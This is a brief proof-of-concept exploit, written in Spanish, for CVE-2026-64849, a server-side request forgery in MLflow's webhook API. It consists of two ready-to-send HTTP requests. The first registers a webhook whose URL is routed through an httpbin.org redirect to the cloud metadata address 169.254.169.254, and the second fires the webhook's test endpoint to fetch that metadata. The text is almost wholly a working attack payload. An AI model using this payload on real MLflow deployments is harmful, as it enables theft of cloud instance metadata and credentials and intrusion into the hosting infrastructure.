
Exploit de prueba de concepto para CVE-2026-64849: desencadena SSRF en la API de webhook de MLflow mediante una POST manipulada, obteniendo metadatos de instancia en la nube desde 169.254.169.254.
POST /api/2.0/mlflow/webhooks HTTP/1.1
Host:
Content-Type: application/json
{"url": "https://httpbin.org/redirect-to?url=http://169.254.169.254/latest/meta-data/", "name": "poc", "events": [{"action": "CREATED", "entity": "REGISTERED_MODEL"}]}
POST /api/2.0/mlflow/webhooks/{id}/test HTTP/1.1